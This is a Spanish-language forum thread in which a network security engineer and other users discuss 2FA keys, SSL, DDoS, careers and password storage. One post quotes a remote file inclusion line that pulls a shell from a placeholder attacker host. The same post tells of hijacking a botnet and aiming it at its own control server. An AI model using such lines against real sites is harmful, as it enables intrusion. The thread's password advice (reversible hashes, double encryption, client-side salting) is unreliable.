Soy ingeniero de seguridad de redes y respondo

Kartalon

#90 Basicamente una llave USB que actua como segundo factor de verificacion, analogo al chip&pin de las tarjetas de credito:

http://googleonlinesecurity.blogspot.co.uk/2014/10/strengthening-2-step-verification-with.html

http://fidoalliance.org/adoption/video/yubico-fido-alliance-universal-2nd-factor-u2f-demonstration

Nucklear

#87 Pues de U2F opino que está bien, pero que a mayor masa de usuarios mas inseguro se hará como todo en este mundo. El dia que alguien consiga spoofear uno de esos dispositivos la protección quedará utilizada. A mi parecer unificar el segundo factor de autenticación es un error.

Pero bueno como podeis ver soy bastante paranoico con estas cosas, y suelo intentar evitar servicios y software que tengan una gran masa critica. Si me quieren petar que diseñen un ataque específico contra mi y no que lancen una bateria de ataque spor defecto y me pillen. No se si me explico...xD

2 respuestas
kaitoo

#92 Eres paranoico de cojones, tu podrias ser un buen manager de un equipo de seguridad. Deberia de aprender un poco de ti y ser mas paranoico lol

edit: http://www.darknet.org.uk/2014/12/icann-hacked-including-root-dns-systems/

Otros mas que caen , si a los hackers les da por acceder a los root DNS (no debe de ser nada facil, y con la informacion que han extraido no tendran suficiente) y follarse los registros voy a cobrar el doble pronto :D

Attackers sent staff spoofed emails appearing to coming from icann.org. The organization notes it was a “spear phishing” attack, suggesting employees clicked on a link in the messages, and then typed their usernames and passwords into a bogus webpage, providing hackers with the keys to their accounts.

Otro caso mas de layer8 :qq:

bornex

#90 Estoy (espero) en mi ultimo año de carrera de Ingenieria Informática. No se que master haré, gracias por la info.

leonsegui

#56 siempre al pie del cañon

le hablo a el porque a los demas no os entiendo, aunque con la borrachera me he leido algun que otro tochaco

1
garlor

#57 se te ha olvidado una de las grandes claves para los que usan windows, desactivar la opcion de "ocultar extensiones para tipos de archivo conocidos"

la de infecciones que se evitarian si la gente supiera que un exe nunca va a ser un video/foto/cancion xD

Saiko9

#1 hacia donde dirijo mis estudios en la carrera para el tema de seguridad.

Estudio ing informatica de momento he tirado para el itinerario q dan la asignatura tocha de redes y seguridad, asignaturas como criptografia t vienen bien?

Después de la carrera recomiendas algún master en concreto o algo?

2 respuestas
R3P1S0

#1 lo primero genial y gracias por el post, seguro vas a tener trabajo a diario porque en este tipo de tema... siempre surgen dudas, allá voy!

protocolo SSL, hace poco se conocio las vulnerabilidades que habia con este protocolo de seguridad, a día de hoy ves factible dejarse la pasta en los https ? visto que con un main in the midle y un ssl strip (por ponerte un ejemplo), seguro que es algo más complejo el ultimo caso que ocurrio con paypal, pero vamos veo que han acmbiado a otro protocolo, TLS, por lo tanto SSL de momento esta descatalogado? merece la pena gastarse dineros en dichos certificados?

cuanto se puede llegar a cobrar por un analisis de seguridad a una empresa corriente?

que opiniones te merecen las grandes ISP de españa en cuanto a seguridad?

Gracias y una ultima cosa, cuentanos la anecdota más graciosa que le haya pasado a "un amigo" en los mundos oscuros de la red :P alguna botnet desastrosa? alguna historia así chula? este post se va a favoritos <3<3

2 respuestas
kaitoo

#97 Entrar en seguridad es dificil sin tener background en otros campos primero (el mio redes). Te recomendaria que te sacases el CCNA (la certificacion real, nada de cursos online).

Con CCNA + ingenieria tienes de sobra para encontrar un primer trabajo, cuando ya estas en la faena puedes focalizarte en un campo mas especifico (voip, security, Service Provider).

Si quieres ir por el camino de pentesting supongo que sera diferente, a ver que dice Nucklear! ( #92 )

#98 No estoy muy enterado, pero los certificados no son caros no? Todo depende de para que es tu pagina web, si envuelve algun tipo de informacion confidencial HTTPS es un must.

No he trabajado con/para ningun ISP en Espanya, creo que Hipnos ( #85 ) trabaja para Telefonica y te puede dar su impresion :)

Anecdotas tengo y muchas (sobre todo en mi epoca de trabajar para un ISP americano), ya las contare mas adelante!

2 2 respuestas
Nucklear

#98 Si, merece la pena pagar por un certificado. Como ya dije antes ssltrip es un problema de configuración del servidor y no de ssl en si. Heartbleed ya fue parcheado al igual que Beast y Poodle se arrelga con TLS. Ademas de que es una medida adicional de seguridad el certificado es una medida de confianza, y ayuda a los usuarios a diferenciar una web fraudulenta de la legítima.

Si no es mucha confianza yo cuento una anecdota de un "amigo". Un usuario de MV contactó a mi amigo un dia por que había visto unas cosas raras en el log del servidor de su empresa. Al pasarle un extracto de este se veia que lo que estaban intentando hacer los atacantes era explotar un RFI en la web (En realidad era un bot que se alimentaba de dorks de google para ir probando webs masivamente). En resumen lo que hacian era esto:

http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt

La shell que ejecutaban se conectaba desde el servidor victima a un servidor IRC usando los credenciales que la shell llevaba hardcodeados. Así que mi "amigo" recopiló todos los datos que pudo del malware y con los credenciales se conectó al IRC desde donde los malos controlaban la botnet. (Los muy retrasados solo tenian un bot que validaba que el que se conectaba tenia un nick específico) así que "mi amigo" se hizo pasar por un bot y estuvo durante varios dias recopilando los logs del canal hasta que se aburrió.

De aqui se supo que los atacantes eran de Indonesia y varias cosas mas. Antes de enviar los datos al GDT de la guardia civil mi "amigo" se puso a echar un vistazo al servidor IRC y resulta que en el mismo tenian alojada una web, con el listado de directorios activo y con varios archivos ZIP que resultaron ser los logs del IRC, logs entre los que se encontraban las IPS de los usuarios (Los atacantes) que se conectaban al IRC y alguna cosa interesante mas.

Esas IPs eran de servidores comprometidos en Israel desde las que se conectaban pero un descuido suficientemente importante como para pillarlos.

Por último "mi amigo" antes de salir apuntó la botnet al servidor IRC para que ésta hiciese un DDoS a su propio centro de control y se inutilizase.

Fue gracioso :3

#97 Pues creo que para eso lo mejor es que te informes en tu propia facultad. Pero en mi opinión para trabajar en seguridad es algo que demuestras trabajando mas que con certificaciones y estudios. Yo vengo de DAI y todo lo que se lo se por aprender en mi casa. Pero tambien en mi empresa valoran lo que hace una persona y no lo que diga un titulo así que no soy el mas indicado para hacer recomendaciones en ese sentido.

Lo que si te puedo decir es que vas a necesitar saber de todo.

4 1 respuesta
Aeon

#1 A favs directo. Gracias por currarte este hilo, crack.

Aunque yo también trabaje en el sector IT, te voy a hacer más preguntas propias de la vida de allí que de tu profesión:

  • ¿En general, la gente de allí está capacitada de entender/hablar inglés? Tanto jóvenes (fuera de tu trabajo), como puretas.
  • Doy por hecho que has estado en Praga. ¿Si te diesen a elegir vivir en Brno o Praga cuál elegirías y por qué?
  • ¿Principales diferencias entre checos/as y españoles/as (carácter)?
  • ¿Cuál suele ser tu horario de trabajo?
  • ¿Tú o tus compañeros soléis hacer horas extras? ¿Os las pagan?
  • Lo que más me ha sorprendido es que has dicho que en IT se puede llegar a cobrar x2 en tu trabajo comparándolo con España. ¿De verdad crees que es tan basta la diferencia? Porque no es un país que se caracterice por tener grandes salarios. En España te puedes encontrar mierdas en IT mal pagadas siendo junior, pero si eres un poco espavilado puedes tener un contrato decente y cobrar 20k+ brutos sin experiencia (dev).
1 respuesta
B

#1

Mi trabajo (Network Security Engineer) basicamente consiste en evitar que hackeen a empresas del fortune 100

No soy un experto en vulnerabilidades

Algo no me cuadra. Si no eres experto no debería ser tu trabajo evitar accesos a MULTINACIONALES, sino más bien a empresas pequeñas. Ya entendemos por qué Sony fue hackeada si meten a no-expertos a proteger sus redes xD

1 respuesta
kaitoo

#101

- ¿En general, la gente de allí está capacitada de entender/hablar inglés? Tanto jóvenes (fuera de tu trabajo), como puretas.

En el ambiente empresarial todos hablan Ingles perfecto. En Praga la mayoria de la gente joven hablan un ingles muy bueno, y la gente mayor una importante cantidad (sobretodo los que trabajan de cara al publico en el centro).

- Doy por hecho que has estado en Praga. ¿Si te diesen a elegir vivir en Brno o Praga cuál elegirías y por qué?

He vivido en Brno 1y6m y mi novia es de alli. Tengo muchos amigos y viajo constantemente. La verdad es que Brno tiene sus pros y sus contras. Hay muchas companyias de IT y la ciudad no es grande. Por otra parte, a los moravos no les gusta los extranjeros, son muy reticentes a abrirse a ti a no ser que insistas mucho.

- ¿Principales diferencias entre checos/as y españoles/as (carácter)?

La mayor diferencia viene marcada por 41 anyos de comunismo. Como ya he dicho antes, no estan acostumbrados a extranjeros y tienes que demostrarles que quieres ser parte de su familia o amigos antes de que se abran a ti. Una vez te consideran amigo/familia es una pasada :)

- ¿Cuál suele ser tu horario de trabajo?

Trabajo desde casa y depende de cada semana, normalmente turnos de 8h en EDT business hours o 4 horas adelantados a ellos (de 11 a 7, de 13 a 21, de 15 a 23, etc...).

- ¿Tú o tus compañeros soléis hacer horas extras? ¿Os las pagan?

Horas extras no hacemos mucho, si las hacemos las pagan. Estamos 'on call rotation' y si hay urgencia nos pegan un toque por la noche, lo pagan bien tambien.

- Lo que más me ha sorprendido es que has dicho que en IT se puede llegar a cobrar x2 en tu trabajo comparándolo con España. ¿De verdad crees que es tan basta la diferencia? Porque no es un país que se caracterice por tener grandes salarios. En España te puedes encontrar mierdas en IT mal pagadas siendo junior, pero si eres un poco espavilado puedes tener un contrato decente y cobrar 20k+ brutos sin experiencia (dev).

Creo que me entendiste mal.... Lo que quise decir es que para un puesto de IT junior pagan x2 el salario medio checo. Eso viene a ser sobre los 1500E netos o asi... Con eso te da para pegarte la vida padre en CZ :) Una vez que asciendes los salarios suben en concordancia... un puesto de senior IT esta sobre los 100k czk al mes (4000E al mes) dependiendo de la especialidad, pero digamos que andan entre 80k-120k al mes.

En Brno los salarios son mas bajos (maximo 70k-80k czk) , pero los precios de alquiler son mas bajos tambien.

Un placer resolver tus dudas!

#102 leete todo el hilo y luego saca tus propias conclusiones... Entenderas mejor a que me dedico especificamente.

1 1 respuesta
_Akiles_

#22 nosotros tenemos Arbor aunque no lo gestionamos, solo acceso a la monitorizacion y documentacion, lo que no se yo es hasta que punto llegaria a mitigar, o como afectaria al servicio esa mitigacion en el caso de un ataque gordo, ya que -a grandes rasgos- necesita analizar patrones de trafico para poder filtrar cual es legitimo y enviarlo al destino.

Hipnos

#99 Joder espero que lo hayas deducido, porque si me has pillado la ip eres un crack xD

No puedo hablar de mis clientes ni de mi empresa, pero las arquitecturas de seguridad suelen ser como comenta basadas en IPS, FW etc.

El cifrado ssl e ipsec se siguen utilizando y no hay una alternativa clara y directa en uso a día de hoy. Como mucho plataformas intermedias como zscaler.

Si te quieres especializar en algo concreto lo suyo es entrar a trabajar directamente con fabricantes: F5, A10, allot, palo alto, fortinet...

Cada fabricante propone sus arquitecturas y es interesante todo ese mundillo y sus diferentes aproximaciones.

Zerokkk

#30 #29 Si el DDoS es muy masivo de dios, no hay nada que pueda pararlo. Quizá tengas un sistema que mande a cuenca los ICMPs, pero si te llegan miles de millones de peticiones por segundo, éste va a terminar colapsando y no será capaz de filtrar correctamente los paquetes entrantes. No existe solución actual definitiva contra el DDoS por mucho que se quiera hacer ver lo contrario.

Lo que hay son servicios que protegen contra ataques de hasta bastante envergadura (véase Cloudflare como ya han comentado antes, entre otros), pero si de verdad se montan una botnet poderosa y lo hacen en serio, te tiran lo que sea.

A menos que, claro está, en este último año hayan cambiado mucho las cosas.

1 2 respuestas
E

#106 nada ha cambiado, para parar un ddos la única opción es que el ancho de banda que soorta tu web (web + sistemas de mitigación + procesamiento y analisis de los paquetes) sea mayor que la del atacante.

Yo, por lo que veo es que cada año tantos los ataques como las defensas van a más en cuanto a capacidades.

1 respuesta
archienemigo

¿Cual es el mejor método para cifrar una contraseña que genere un usuario en una web? Y guardarla en una BD claro.

2 respuestas
Hipnos

#108 Ningún sistema usuario contraseña es seguro. El futuro es la comprobación de identidad. Para eso hay muchas aproximaciones... Una muy interesante es la que propone Eleven Paths con su app "Latch" (pestillo).

https://latch.elevenpaths.com/

1 1 respuesta
benitoll

#106 #107 cuando se llega a cierto tamaño, digamos que las normas son las mismas, pero hay "normas adicionales" que condicionan a las demás.

Ya no se trata "sólo" de el ancho de banda combinado, sino también de su origen, y de la capacidad de interconexión entre dicho origen y el "objetivo" del ataque, que si es suficientemente grande (por ejemplo Google, Cloudflare...).

Por ejemplo, Google es prácticamente "intirable" (permitidme el término xD) aunque tengas un ancho de banda disponible para el ataque mayor que el ancho de banda total de Google, porque lo tienen distribuido, y si el 90% del ataque viene de Rusia y China, pues tal vez satures el servicio... en Rusia y China. Además de probablemente "ralentizar el internet" a nivel general (de esos países) en ciertas zonas y bajo ciertos proveedores (porque el ataque tiene que ser muy grande para tirar Google aunque sea regionalmente xD). Pero el resto de regiones apenas se verían afectadas.

archienemigo

#109 Bueno, que es lo más recomendable para que un niño de 14 años leyendose un tutorial no te pueda joder. El mejor metodo vaya. Lo unico que se me ocurre es hacer hash sobre otro hash, para al menos evitar diccionarios.

¿Y la mejor manera de de pasar una contraseña? Hasta ahora lo más que hago es recibirla por POST tal cual y luego hacerle un hash. No tengo ni idea de como de inseguro es eso. Y si la recojo con javascript para por ejemplo, comprobar mediante AJAX si es correcta. ¿Por donde me pueden meter mano?

2 respuestas
Hipnos

#111 Yo no soy hacker, pero dudo mucho que un hash sea más seguro que una contraseña. Si al final vas a comparar hashes, hay diccionarios de hashes tan buenos como de contraseñas.

2 respuestas
E

#112 encriptar(encriptar(pass + salt))

2 respuestas
archienemigo

#112 Hombre como menos encriptarla. Aun sin buscar si los hay, dudo que haya diccionarios tal y como dice que se haga #113

¿Es la mejor manera o alguien aporta algo más?

2 respuestas
Hipnos

#114 ¿Pero de qué tienes miedo? ¿De un SQL inyection? ¿Cracking de passwords? ¿Phising?

1 respuesta
E

#114 lo mejor es siempre un salt, ahora bien... ¿Donde guardas el salt? ¿En otra base de datos aparte? ¿Integrado en la web y de forma aleatoria?

archienemigo

#115 No se de que tengo miedo por que desconozco que ataques pueden hacer. No tengo ni idea vaya. Lo que quiero saber es cual es la mejor forma únicamente.

Zerokkk

#111 Lo del hash es fácil de romper, a veces hasta echando un ojo a una página puedes encontrar el hash de cifrado.

El problema es:

  • El cifrado se realiza en el servidor mediante php: la contraseña es visible en los paquetes enviados al mismo. Esnifas la red y tienes la contraseña.

  • El cifrado se realiza en el cliente: análisis de código JavaScript y ya tienes la clave del hash para realizar la operación inversa. Gg.

Realmente lo único seguro es usar SSL, que utiliza certificados de seguridad con cifrado asimétrico. Esto, aunque hay formas de cargárselo, es mucho más seguro. Bien implementado es prácticamente irrompible. Las webs con el prefijo HTTPS usan este protocolo.

El problema luego es que con un keylogger o cualquier malware a bajo nivel, se puede robar la contraseña antes de que ésta entre en la capa de seguridad (directamente leyendo las pulsaciones de teclado). Nunca hay una seguridad plena xD.

1 respuesta
archienemigo

#118 Si, https lo conozco, más o menos se de que me hablas. Lo que queria era ver si hay algo que desconociese. Por lo tanto, sin usar SSL no hay ninguna manera de enviar la contraseña cifrada a el servidor para que PHP lo procese.

Osea en cuanto envias el formulario ya estas jodido. Lo único que se me ocurre ahora mismo, es añadirle el salt a la contraseña que elija el usuario antes de que se envie, y aunque la intercepten no la tendrán tal cual.

1 respuesta
Saiko9

#99 Vale, muchas gracias creo que de momento te haré caso pero no tengo mucha idea de por donde tirar xD (a ver si me pongo a informarme) soy un gran programador en cualquier nivel y también se me da genial la arquitectura de computadores, redes(nivel de uni)... veo que me recomiendas que me meta en el ajo antes de elegir el camino concreto te intentaré hacer caso ya que estoy muy indeciso y me gusta casi todo xD.

#100 Esta claro que un grande en seguridad te forjas por tu cuenta pero depende mucho de en lo que te centres... coger una buena base de programación, computacion o matematicas es una cosa que al menos para mi sin una carrera sería imposible pero vamos que entiendo lo que dices aunque ciertos campos de seguridad o eres un genio o sin la base de estudios necesaria es casi imposible, yo tengo el grado superior de administracion de sistemas y redes y me meti a la carrera justamente por eso.